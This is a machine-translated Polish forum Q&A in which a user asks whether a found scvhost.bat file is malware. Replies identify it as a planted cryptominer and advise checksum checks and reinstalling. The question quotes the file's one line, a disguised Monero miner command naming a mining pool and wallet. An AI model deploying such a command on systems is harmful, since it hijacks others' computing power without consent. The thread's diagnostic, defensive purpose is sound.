Czy ten scvhost.bat z kryptowalutą jest wirusem lub górnikiem?

17

Właśnie znalazłem ten plik .bat o nazwie scvhost.bat. Plik zawierał tę treść:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Czy to wirus (aby ukraść informacje itp.) Czy zasadzony górnik? Martwię się, ponieważ zajmuję się także kryptowalutami i stratumjest to waluta wymieniona w powyższym pliku.

windows batch-file malware cryptomining NewbieProgrammer
źródło
1
To rzeczywiście wydaje się być górnikiem. Biorąc pod uwagę, że sam używasz kryptowalut, jeśli również kopiesz, upewnij się, że tak naprawdę nie jest to część tego, czego używasz do wydobywania. Możesz to zrobić, zmieniając nazwę rozszerzenia .bat na coś innego i sprawdź, czy nadal możesz normalnie kopać po ponownym uruchomieniu. Jedną rzeczą, która wydaje mi się dziwna w tym pliku, jest to, że normalnie wywoływałby się sam, biorąc pod uwagę, że scvhost to zarówno nazwa wykonywanego przez niego pliku, jak i plik bat. Zwykle spowodowałoby to powstanie pętli.
LPChip
2
@VirtualAnomaly Myślę, że mylisz sVChost ze wspomnianym tutaj sCVhost. Tak, jestem bardzo świadomy, że svchost to mechanika usług hostingowych.
LPChip
2
@LPChip Przepraszam, masz rację, pomyliłem się.
Wirtualna anomalia
2
Chyba ktoś grał za dużo w StarCrafta.
CodesInChaos
1
SCV @lucidbrot to jednostka „konstruktora” jednej z ras gry (terrans), w którym to przypadku oznacza „pojazd kosmiczny”.
Aaron

Odpowiedzi:

34

Wydaje się, że jest to pewnego rodzaju górnik, zwłaszcza że parametr zawiera adres URL puli wydobywczej. Musisz jednak upewnić się, co znajduje się w pliku binarnym. Sensowne byłoby porównanie sum kontrolnych pliku binarnego znalezionego w systemie z wydaniami dokonanymi przez zespół programistów górnika. Jeśli się różnią; uważają cię za niezabezpieczony system.

Innym problemem jest to, że dowiedziałeś się o tym górniku (prawdopodobnie dlatego, że zużywał dużo procesora), ale nie masz pojęcia, co jeszcze wydarzyło się w twoim systemie. Gdyby intruz mógł uruchomić górnika, mogliby również uruchomić inne rzeczy. Dobrym pomysłem może być odzyskanie danych z kopii zapasowej lub wykonanie nowej instalacji.

mtak
źródło